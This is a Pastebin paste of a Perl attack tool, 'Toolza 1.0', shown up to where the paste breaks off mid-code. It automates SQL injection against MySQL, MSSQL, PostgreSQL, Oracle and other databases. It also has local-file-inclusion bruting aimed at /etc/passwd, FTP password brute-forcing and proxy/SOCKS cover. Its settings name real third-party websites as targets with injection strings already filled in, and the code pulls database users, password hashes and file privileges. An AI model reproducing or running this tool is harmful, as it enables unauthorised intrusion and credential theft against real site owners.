SHARE
TWEET

V3xD

a guest Sep 22nd, 2011 917 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl - UTF-8 encoding
  2. use threads;
  3. use threads::shared;
  4. use IO::Socket;
  5. #use IO::Socket::SSL; # For enable HTTPS support uncomment this line
  6. my $num : shared;
  7. my $good : shared;
  8. my $ck1 : shared;
  9. ###########################################################################
  10. ## ?????????? ????????? ??? ???? ??????? | Global settings for all modes ##
  11. ###########################################################################
  12. $test_mode = 0;# when 1 - print get/post page content in terminal0
  13. $method = 0; # 1- Post; 0 - GET ????? ???????? | Post or Get method, 1-POST; 0-GET|||||SAFE POST - with $sql_post, line 27
  14. $get_method = 0; # 0 - via IO::Socket, 1 - via LWP::Simple -  if can't get DATA
  15. $use_proxy = 0; # 0 - ??? ??????; 1 - c ?????? | 1 -Use proxy; 0 - No proxy
  16. $proxy = "proxy.txt"; # ???? ? ???????? | Proxy file
  17. $use_socks = 0; # 0 - ??? socks; 1 - c socks | 1 -Use socks; 0 - No socks
  18. $socks_file = "socks.txt";# ???? ? SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
  19. $kol_threads = 10; # ???-?? ???????, ????????????? -10 | Number of threads - 10 recommended
  20. $timeout = 20; # ??????? ? ???????? | Timeout in seconds
  21. $cookie = 'PHPSESSID=qeqp01ccc006ra904qtaouoct0;b=b'; # ???? ??? ??? - ????????? "" | If no coockie set ""
  22. $https_mode_auth = 1; # 1 - whith authorization, 0 - no
  23. $https_auth_script_path = "/signin.php";
  24. $https_auth_post_data = "uname=qqq&passwd=123&Submit=Sign+In";
  25. $referer = "http://google.com"; # ???????, ???? ??? ????????? "" | If no referer set ""
  26. $user_agent = "Mozilla/5.0 (Windows NT 5.1; U; ru; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10"; # ???? ?????, ???? ??? ????????? "" | If no user agent set ""
  27. $sql_post = ""; # SQLi Post parameter
  28. #$sql_header = "Accept-Language: 1+and+1=1+or";# SQLi Header parametr (include COOKIE), if present before - comment it with "#"
  29. $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
  30. $pause = 0; # ????? ????? ????????? ? ???????? | Pause between requests in seconds
  31. #########################################################################################################################################
  32. ## ???????? ????????? MySQL - ?????? ?????????????? ???? ????????? " ^ " |MySql Basic options -  print " ^ " instead of printable field #
  33. #########################################################################################################################################
  34. $source_sql = "http://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=(1)and(0)union+select+1,2,3,^,5,6,7,8,9,10,11,12";
  35. $filtr = "--+"; # close SQL
  36. $plus = "+"; # /**/,%20,%2b & etc.
  37. $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
  38. $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
  39. $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
  40. $aes_key = "0x71"; # AES key
  41. ######################################
  42. ## MySql4 brute # URL = $source_sql ##
  43. ######################################
  44. $source_table_list = "source_table_list.txt"; # ????-??????? ??? ????? ?????? ? MySql4
  45. $source_column_list = "source_column_list.txt"; # ????-??????? ??? ????? ??????? ? MySql4
  46. ######################################
  47. ## Site Scanner for folders & files ##
  48. ######################################
  49. $scan_url = "site.com"; # ??? ????? ? ?????
  50. $folder_list = "scaner_folder_list.txt"; # ????-??????? ??? ??????? ?????/??????
  51. $error_list = "scaner_errors_list.txt"; # ???? c ???????? ??????? ??????? ??? ???????????? ??????? ?????/?????
  52. ###################################
  53. ## LFI/READER/Load_file() bruter ##
  54. ##########################################################################################################
  55. # LFI/READER/Load_file, ?tc/passwd ???????? ?? " ^ " , ??? ? ? load_file('/etc/passwd') = load_file('/^')#
  56. # ??? ? load_file(0x2f6574632f706173737764) = load_file(^)                                               #
  57. ##########################################################################################################
  58. $lrl_url = "http://dominionpropertymanagement.com/index.php?option=com_propiedades&controller=../../../../../../../../../../../^%00";
  59. $lrl_error_message = "require_once"; # ??????? (????? ???????), ??????? ?????, ???? ?????? ???????????? ??????|Message when wrong
  60. $lrl_list = "logs.txt"; # ????-??????? ??? ??????? ?????/?????? | File with paths/files
  61. ################################################################################
  62. ## Blind SQL-injection ????????? - ??????? +and+mid(version(),1,1)=5--+ ##
  63. ################################################################################
  64. $bl_mode = 1; # mode of blind sql injection:
  65. #-----------------------------------------------------------------------------------------------------------------
  66. # mode 0 example - http://site.com/index.php?id=1+and+mid(version(),1,1)=5--+
  67. #in script:
  68. #$bl_url = "http://site.com/index.php?id=1";
  69. #$bl_filtr = "--+";
  70. #$bl_plus = "+";
  71. #$bl_error = "here_wrong_message";
  72. #$bl_error_type = 0;
  73. #-----------------------------------------------------------------------------------------------------------------
  74. # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+mid(version(),1,1)=5),1,(select+1+union+select+2))
  75. #in script:
  76. #$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
  77. #$bl_filtr = "),1,(select+1+union+select+2))";
  78. #$bl_plus = "+";
  79. #$bl_error = "here_wrong_message";
  80. #$bl_error_type = 0;
  81. #-----------------------------------------------------------------------------------------------------------------
  82. $bl_url = "http://www.flygo.ru/1'or"; # url
  83. $bl_filtr = "--'"; # close SQL
  84. $bl_plus = "+"; # /**/,%20,%2b & etc.
  85. $bl_error = '???????'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  86. #$bl_error = 'height="45"'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  87. $bl_error_type = 0; # ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  88. $bl_your_query = ""; #example - concat_ws(0x3a,table_schema,table_name)
  89. $bl_from = "";#without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273
  90. ##################################################################################
  91. ## NAME_CONST Blind SQL-injection ????????? - ???????? version() ??? ???? ?? "^"##
  92. ##################################################################################
  93. $nc_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(^,0x3a,@:=@-1))--+^"; # url
  94. $nc_plus = "+"; # /**/,%20,%2b & etc.
  95. #############################################################
  96. ## ???????? ????????? MySQL injection column number bruter ##
  97. #############################################################
  98. $source_sql_c = "http://site.com/more.php?pid=4847+or+1=1";# url
  99. $filtr_c = "--+"; # close SQL
  100. $plus_c = "+"; # /**/,%20,%2b & etc.
  101. $sql_mess = "on line 28";# ????? ????????????? ???????????/????????????? ??????? | Message when wrong number of columns
  102. $sql_mess_type = 0;# ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  103. $sql_max_column_number = 120; # Max column number for brute
  104. #############################################################################################
  105. ##            FTP checker                                                                  ##
  106. #############################################################################################
  107. $ftp_list = "ftp.txt"; # file with unchecked ftp
  108. $ftp_save = "ftp_good.txt"; # file with checked & good ftp
  109. $ftp_def_port = 21; # default ftp port
  110. #############################################################################################
  111. ##            FTP bruter                                                                   ##
  112. #############################################################################################
  113. $ftp_host = "ftp.example.com"; # ftp host
  114. $ftp_def_port_b = 21; # default ftp port
  115. $ftp_login = ""; # when know login, passwords brute
  116. $ftp_pass_file = "ftp_pass.txt"; # when know login, passwords brute
  117. $ftp_pass = ""; # when know password, logins brute
  118. $ftp_login_file = "ftp_login.txt"; # when know password, logins brute
  119. $ftp_login_pass_file = "ftp_login_pass.txt"; # login:password brute
  120. $ftp_login_pass_del = ":"; # login:password delimetr (:|; & etc)
  121. #############################################################################################
  122. ##            PROXY checker                                                                ##
  123. #############################################################################################
  124. $proxy_list = "proxy.txt"; # unchecked proxy file
  125. $proxy_save = "proxy_good.txt"; # checked & good proxy file
  126. #############################################################################################
  127. ##            PROXY grabber                                                                ##
  128. #############################################################################################
  129. $proxy_site_list = "proxy_site_list.txt"; # file with sites with free proxy
  130. #############################################################################################
  131. ##            MSSQL injection                                                              ##
  132. #############################################################################################
  133. $ms_url = "http://site.com/showSubcategories.aspx?categoryid=1%20or%201="; # url
  134. $ms_spase = "/**/"; #%20,%2b & etc.
  135. $ms_close = ""; #close SQL
  136. $ms_convert_in = 0; # 0 - don't use convert(int,(data)), 1 - use convert(int,(data))
  137. ######################################################################################################################
  138. ## PostgreSQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field #
  139. ######################################################################################################################
  140. $p_union_select_url = "http://example.com/index.php?id=-5+null,^,null"; # url UNION+SELECT method
  141. $p_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  142. $p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
  143. $p_filtr = "--+"; # close SQL
  144. $p_plus = "+"; # %20,%2b & etc.
  145. $p_convert = "text"; # convert data type(text,int ... etc.) - for subquery method
  146. #####################################################################################################
  147. ##          Sybase SQL                                                                             ##
  148. #####################################################################################################
  149. $s_union_select_url = "http://example.com/index.php?id=-1+union+select+null,^,null"; # url UNION+SELECT method
  150. $s_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  151. $s_method = 0;# 0 - UNION+SELECT method, 1 - SUBQUERY method
  152. $s_filtr = "--+"; # close SQL
  153. $s_plus = "+"; # /**/,%20,%2b & etc.
  154. $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
  155. #####################################################################################################
  156. ##          Ms Access & Jet SQL                                                                    ##
  157. #####################################################################################################
  158. $a_source_sql = "http://site.com/?l=news&o=display&page=&idx=317"; # url
  159. $a_filtr = ""; # close SQL
  160. $a_plus = "+"; # %20,%2b & etc.
  161. $a_error_code_column_more = "80040e14"; # method ORDER BY - error code when column number is MORE
  162. $a_error_code_table = "80040e37"; # error code when wrong table
  163. $a_error_code_column = "80040e10"; # error code when wrong column
  164. $a_max_column_number = 100; # max column number for brute
  165. #######################################################################################################################
  166. ## Oracle SQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field ##
  167. #######################################################################################################################
  168. $o_source_sql = "http://example.com/index.php?id=-5+null,^,null"; # url
  169. $o_filtr = "--+"; # close SQL
  170. $o_plus = "+"; # %20,%2b & etc.
  171. $o_convert = "char"; # default type to convert printable field - char
  172. #######################################################################################################################
  173. ## Firebird/Interbase SQL##
  174. #######################################################################################################################
  175. $fi_source_sql = "http://example.com/image.php?operator=2)+and+1="; # url http://example.com/image.php?operator=2)+and+1=cast(user+as+char(777))--
  176. $fi_filtr = "--"; # close SQL
  177. $fi_plus = "+"; # %20,%2b & etc.
  178. $fi_convert = "char(777)"; # default data type - char(777)
  179. #####################################################################################################
  180. ## floor(rand()) MySQL## example: http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+ # Blind SQL inj alternative
  181. #######################################################################################################################
  182. $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
  183. $f_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(1)or(select(1)from"; # url
  184. $f_plus = "+"; # %20,%2b & etc.
  185. $f_filtr = "--"; # close SQL
  186. #####################################################################################################
  187. ## ???? ?????? ?? ???????, ???? ?? ?????, ??? ?????? | Don't touch anything below if you don't know what you do ##
  188. ##################################################################################################################  #####################################################################################################
  189. if ($method == 1) {
  190.      $method = "POST";
  191. } else {
  192.      $method = "GET";
  193. }
  194. $search="+";
  195. $replacement=" ";
  196. sub collect {
  197.  my $datass = $_[0];
  198.  my $cookies = undef;
  199.  while($datass =~ /Set-Cookie: (.+?)(;|\r)/igs){
  200.    $cookies .= $1."; ";
  201.  }
  202.  return $cookies;
  203. }
  204. sub req {
  205.  my($hosts, $paths, $types, $datas, $cookiess) = @_;
  206.  my $https_sock = IO::Socket::SSL->new("$hosts:443");
  207.  my $request = "$types $paths HTTP/1.1\n".
  208.  "Host: $hosts\n".
  209.  "Cookie: $cookiess\n";
  210.  if($types eq "POST") {
  211.      $request .= "Content-type: application/x-www-form-urlencoded\n".
  212.      "Content-Length: ".length($datas)."\n\n".$datas;
  213.  } else {
  214.      $request .= "\n";
  215.  }
  216.  print $https_sock $request;
  217.  my $answ = undef;
  218.  while(my $buf = <$https_sock>) {
  219.      $answ .= $buf;
  220.  }
  221.  return $answ;
  222. }
  223. $socks_check = 0;
  224. $https_flag = 0;
  225. $https_auth_check = 0;
  226. $sql_data_flag = false;
  227. my ($CRLF,$port4,$login,$pass,$sock_res);
  228. $CRLF = "\015\012";
  229. ($lrl_start, $lrl_end) = split (/\^/, $lrl_url);
  230. $lrl_url =~ /^http:\/\/?([^\/]+)/i;
  231. $host2 = $1;
  232. $bl_url =~ /^http:\/\/?([^\/]+)/i;
  233. $host3 = $1;
  234. $lrl_url = $lrl_start . "[BRUTE]" . $lrl_end;
  235. $f_url =~ /^http:\/\/?([^\/]+)/i;
  236. $host13 = $1; # floor
  237. $scan_url =~ /^http:\/\/?([^\/]+)/i;
  238. $host1 = $1;
  239. $source_sql_c =~ /^http:\/\/?([^\/]+)/i;
  240. $host5 = $1;
  241. ($nc_start,$nc_midle,$nc_end) = split(/\^/,$nc_url);
  242. $nc_url =~ /^http:\/\/?([^\/]+)/i;
  243. $host6 = $1;
  244. #--- default paterns ----#
  245. $ms_pattern_sys_tab = "Syntax error converting the .* value \'(.*)\' to a column of data type"; # regular expression to parse sys & tables
  246. $ms_pattern_sys_tab1 = "Conversion failed when converting the .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  247. $ms_pattern_columns = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse columns from tables
  248. $ms_pattern_columns1 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  249. $ms_pattern_data1   = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.1
  250. $ms_pattern_data2   = "[SQL Server]Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.2
  251. $ms_pattern_data3 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  252. $ms_url =~ /^http:\/\/?([^\/]+)/i;
  253. $host7 = $1;
  254. if ($p_method == 0) {
  255.     ($p_sql_start, $p_sql_end) = split (/\^/, $p_union_select_url);
  256.     $p_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  257.     $host8 = $1;
  258. }
  259. if ($p_method == 1) {
  260.     $p_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  261.     $host8 = $1;
  262. }
  263. if ($s_method == 0) {
  264.     ($ss_sql_start, $ss_sql_end) = split (/\^/, $s_union_select_url);
  265.     $s_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  266.     $host9 = $1;
  267. }
  268. if ($s_method == 1) {
  269.     $s_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  270.     $host9 = $1;
  271. }
  272. $p_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  273. $p_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  274. $s_sql_pref1 = "0x75737372||"; # ?? ????????
  275. $s_sql_pref2 = "||0x75737372"; # ?? ????????
  276. $a_source_sql =~ /^http:\/\/?([^\/]+)/i;
  277. $host10 = $1;
  278. $a_sql_pref1 = "chr(94)%2b"; # ?? ????????
  279. $a_sql_pref2 = "%2bchr(94)"; # ?? ????????
  280. ($o_sql_start, $o_sql_end) = split (/\^/, $o_source_sql);
  281. $o_source_sql =~ /^http:\/\/?([^\/]+)/i;
  282. $host11 = $1;
  283. $o_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  284. $o_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  285. $fi_source_sql =~ /^http:\/\/?([^\/]+)/i;
  286. $host12 = $1;
  287. $fi_sql_pref1 = 'ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)||'; # ?? ????????
  288. $fi_sql_pref2 = '||ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)'; # ?? ????????
  289. print "-----------------------------------------\n";
  290. $sql_pref1 = "CONCAT(0x75737372,"; # ?? ????????
  291. $sql_pref2 = ",0x75737372)"; # ?? ????????
  292. if ($aes == 1) {
  293.      $sql_CP_start =  "AES_DECRYPT(AES_ENCRYPT(";
  294.      $sql_CP_end = "," . $aes_key . ")," . $aes_key . ")";
  295. }
  296. if ($unhex == 1) {
  297.      $sql_CP_start =  "UNHEX(HEX(";
  298.      $sql_CP_end = "))";
  299. }
  300. if (($aes == 0) && ($unhex == 0)) {
  301.      $sql_CP_start =  "";
  302.      $sql_CP_end = "";
  303. }
  304. if ($limit == 0) {
  305.      $limit =  "";
  306. }
  307. if ($limit == 1) {
  308.      $limit =  $plus . "limit" . $plus . "0,1";
  309. }
  310. if ($limit == 2) {
  311.      $limit =  $plus . "limit" . $plus . "1,1";
  312. }
  313. if ($use_proxy == 1) {
  314.    print "----------------------------------------\n";
  315.    print "You choose mode with proxy, try to find good in $proxy ...\n";
  316.    print "Timeout = $timeout sec:\n";
  317.    print "----------------------------------------\n";
  318.    $proxy_flag = 0;
  319.    open(FILE9, "<", $proxy);
  320.    while(<FILE9>) {
  321.          chomp;
  322.          push(@prox, $_);
  323.    }
  324.    close(FILE9);
  325.    $size = @prox;
  326.    $i = 0;
  327.    while ($i < $size) {
  328.       $current_proxy = $prox[$i];
  329.       ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
  330.       if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  331.            print "Will use --> $current_proxy_host:$current_proxy_port\n";
  332.            $proxy_flag = 1;
  333.            $proxy_message = "$current_proxy_host:$current_proxy_port";
  334.            $i = $size;
  335.       } else {
  336.            print "$current_proxy_host:$current_proxy_port - Bad proxy\n";
  337.       }
  338.       $i++;
  339.    }
  340.    if ($proxy_flag == 0) {
  341.         print "----------------------------------------\n";
  342.         print "No good proxy in " . $proxy . ", change mode. Exit...\n";
  343.         exit;
  344.    }
  345. } else {
  346.    $proxy_message = "no";
  347. }
  348. $flag_check = 0;
  349. print "-----------------------------------------\n";
  350. print "Toolza 1.0 by Pashkela [ BugTrack Team ] (c) 2009\n";
  351. START_global:
  352. if ($get_method == 1) {
  353.      print "------------------------------------------------------------------------------\n";
  354.      print "===================> Only GET-method, no proxy, no socks! <===================\n";
  355.      print "------------------------------------------------------------------------------\n";
  356. }
  357. print "----------------------------------------------------------\n";
  358. print "               Choose mode:\n";
  359. print "----------------------------------------------------------\n";
  360. print "    [1]  Mysql injection\n";
  361. print "    [2]  MSSQL injection\n";
  362. print "    [3]  PostgreSQL injection\n";
  363. print "    [4]  Sybase SQL injection\n";
  364. print "    [5]  Access & Jet SQL injection\n";
  365. print "    [6]  Oracle SQL injection\n";
  366. print "    [7]  Firebird/Interbase SQL injection\n";
  367. print "    =======================================================\n";
  368. print "    [8]  LFI/Reader/Load_file() bruter\n";
  369. print "    [9]  Scan site for folders & files\n";
  370. print "    [10] FTP checker\n";
  371. print "    [11] FTP bruter\n";
  372. print "    [12] Proxy checker\n";
  373. print "    [13] Proxy grabber\n";
  374. print "    =======================================================\n";
  375. print "    [14] Exit\n";
  376. print "----------------------------------------------------------\n";
  377. if($sql_post and !$sql_header){
  378.    $method = "POST";
  379.    $sql_flag = 1;  
  380.    print "SQLi in POST parameter...\n";
  381.   ($sql_start, $sql_end) = split (/\^/, $sql_post);
  382.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  383.    $host100 = $1; # source_sql host
  384. }elsif(!$sql_post and $sql_header){      
  385.    $sql_flag = 2;  
  386.    print "SQLi in HEADER parameter...\n";
  387.    $sql_header =~ s!\Q$search!$replacement!g;
  388.    ($sql_start, $sql_end) = split (/\^/, $sql_header);
  389.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  390.    $host100 = $1; # source_sql host
  391. }elsif($sql_post and $sql_header){
  392.    print "==========================================================================\n";
  393.    print "SQLi in HEADER parameter[\$sql_post] and in POST parametr[\$sql_header]\n";
  394.    print "in \"Global settings\" section - don't supported, choose one, exit...\n";
  395.    print "==========================================================================\n";
  396.    exit;          
  397. }else{
  398.    print "SQLi in GET parameter...\n";
  399.    $sql_flag = 0;  
  400.    ($sql_start, $sql_end) = split (/\^/, $source_sql);
  401.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  402.    $host100 = $1; # source_sql host
  403. }
  404. $choice = <STDIN>;
  405. chomp $choice;
  406. print "Your choice: $choice\n";
  407. ## Mysql ###############################################################################################################
  408. if ($choice == 1) {
  409. START:
  410. if ($source_sql =~ m/^https:\/\/?([^\/]+)/i) {
  411.    $host100 = $1;
  412.    $https_flag = 1;
  413.    print "----------------------\n";
  414.    print "HTTPS mode enabled\n";
  415.    print "----------------------\n";
  416. }
  417. $host = $host100;
  418. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  419.     print "-----------------------------------------\n";
  420.     print "Authorization required, wait please....";
  421.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  422.     $ck1 = collect($answ1);
  423.     $https_auth_check = 1;
  424.  
  425.     print " DONE\n";
  426.     print "-----------------------------------------\n";
  427. }
  428. sub ascii_to_hex($) {
  429.  
  430.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  431.                $str = "0x" . $str;
  432.              return $str;
  433.     }
  434. if ($use_socks == 1 && $socks_check == 0) {
  435.   $check_url = $host;
  436.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  437.            . "Host: $check_host\r\n"
  438.            . "Referer: http://" . $check_url . "\r\n"
  439.            . "Accept: */*\r\n"
  440.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  441.            . "Connection: close\r\n\r\n";
  442.    print "----------------------------------------\n";
  443.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  444.    print "Timeout = 5 sec:\n";
  445.    print "----------------------------------------\n";
  446.    $socks_check = 0;
  447.    $check_socks = socks_check();
  448.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  449.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  450.   if ($current_proxy_host) {
  451.      $socks_check = 1;
  452.      print "Will use --> $proxy_message\n";
  453.   } else {
  454.      $socks_check = 0;
  455.      $proxy_message = "No";
  456.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  457.   }
  458. }
  459. print "----------------------------------------------------------\n";
  460. print "               Choose mode:\n";
  461. print "----------------------------------------------------------\n";
  462. print "    [1]  Mysql inj system information\n";
  463. print "    [2]  Mysql inj get DB-names from information_schema.schemata\n";
  464. print "    [3]  Mysql inj get tables from DB-name\n";
  465. print "    [4]  Mysql inj get column_name from tables from DB-name\n";
  466. print "    [5]  Mysql inj get tables from information_schema (current DB)\n";
  467. print "    [6]  Mysql inj get column_name from table (current DB)\n";
  468. print "    [7]  Mysql inj get data from columns\n";
  469. print "    [8]  Mysql inj brute tables & columns\n";
  470. print "    [9]  Mysql inj column number bruter\n";
  471. print "    [10] Mysql inj Blind\n";
  472. print "    [11] Mysql inj NAME_CONST\n";
  473. print "    [12] Mysql inj floor(rand())\n";
  474. print "    [13] Mysql inj LOAD_FILE (file_priv = Y)\n";
  475. print "----------------------------------------------------------\n";
  476. print "    [14]  Main menu\n";
  477. print "----------------------------------------------------------\n";
  478. $choice = <STDIN>;
  479. chomp $choice;
  480. print "Your choice: $choice\n";
  481. if ($choice == 1) {
  482.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  483.      if ($flag_check == 0) {
  484.            $url0 = $sql_start . $sql_CP_start . "SQL" . $sql_CP_end . $sql_end . $limit . $filtr;
  485.            $flag_check = 1;
  486.            print "-----------------------------------------\n";
  487.            print "Check basic options:\n";
  488.            print "-------------------\n";
  489.            print "$url0\n";
  490.            print FILE "$url0\n";
  491.      }
  492.      #### ?????? ?????? #####################################################
  493.      $url1 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  494.      #### ?????? ??? ???? #####################################################
  495.      $url2 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  496.      #### ?????? ????? #####################################################
  497.      $url3 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  498.      #### ?????? @@basedir #####################################################
  499.      $url4 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  500.      #### ?????? @@datadir #####################################################
  501.      $url5 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  502.      #### ?????? @@tmpdir #####################################################
  503.      $url6 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  504.      #### ?????? @@version_compile_os #####################################################
  505.      $url7 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  506.      #### ?????? mysql.user #####################################################
  507.      $url8 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  508.      #### ?????? mysql.password #####################################################
  509.      $url9 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  510.      #### ?????? file_priv #####################################################
  511.      $url10 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . "mysql.user" . $plus . "where" . $plus . "user=user" . $limit . $filtr;
  512.      #####################################################################
  513.      $thr = $kol_threads; # ???-?? ???????
  514.      $num = -1; # ?? ????????
  515.      print "-----------------------------------------\n";
  516.      print "System information:\n";
  517.      print "-----------------------------------------\n";
  518.      print FILE  "-----------------------------------------\n";
  519.      print FILE  "HOST: $host\n";
  520.      print FILE "-----------------------------------------\n";
  521.      print FILE "System information:\n";
  522.      print FILE "-----------------------------------------\n";
  523.      print "Request method - $method\n";
  524.      print "Threads - $kol_threads\n";
  525.      print "Proxy - $proxy_message\n";
  526.      print "----------------------\n";
  527.      for(0..$thr) {
  528.         $trl[$_] = threads->create(\&gets1);
  529.      }
  530.      for(0..$thr) {
  531.         $trl[$_]->join;
  532.      }
  533.      sub gets1 {
  534.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  535.         $size = @array; #???????? ?????? ???????
  536.         $| = 1;
  537.         while ($num<$size) {
  538.             { lock($num);
  539.             $num++; }
  540.             if($sql_flag == 0){
  541.               $current = $array[$num];
  542.               $content = scan_url();
  543.             } elsif ($sql_flag == 1) {#POST
  544.               $current = $source_sql;
  545.               $sql_post = $array[$num];
  546.               $content = scan_url_POST();
  547.             } elsif($sql_flag == 2){#HEADER
  548.               $current = $source_sql;
  549.               $sql_header_query = $array[$num];
  550.               $sql_header_query =~ s!\Q$search!$replacement!g;
  551.               $content = scan_url_HEADER();
  552.             }
  553.             if ($content =~ m/ussr(.*?)ussr/imgs) {
  554.                   print $1 . "\n";
  555.                   print FILE $1 . "\n";
  556.             }
  557.             print $num . "\r";
  558.             sleep $pause;
  559.         }
  560.      }
  561.      print "----------\n";
  562.      print "Saved in " . "z_" . $host . ".txt\n";
  563.      close(FILE);
  564.      goto START;
  565. }
  566. #### ??????? ?? ##################################################################################################
  567. if ($choice == 2) {
  568.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  569.      ## ???-?? ?? ? information_schema.schemata ##
  570.      $url11 = $sql_start . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.schemata" . $limit . $filtr; # ??????? ???-?? ??
  571.      if($sql_flag == 0){
  572.          $current = $url11;
  573.          $content = scan_url();
  574.      } elsif ($sql_flag == 1) {#POST
  575.          $current = $source_sql;
  576.          $sql_post = $url11;
  577.          $content = scan_url_POST();
  578.      } elsif($sql_flag == 2){#HEADER
  579.          $current = $source_sql;
  580.          $sql_header_query = $url11;
  581.          $sql_header_query =~ s!\Q$search!$replacement!g;
  582.          $content = scan_url_HEADER();
  583.      }
  584.      $bd_num = $content;
  585.      $bd_num =~ m/ussr(.*?)ussr/img;
  586.      $bd_num = $1;
  587.      print FILE "-----------------------------------------\n";
  588.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  589.      print FILE "-----------------------------------------\n";
  590.      print "-----------------------------------------\n";
  591.      print "Data bases in information_schema.schemata - $1\n";
  592.      print "-----------------------------------------\n";
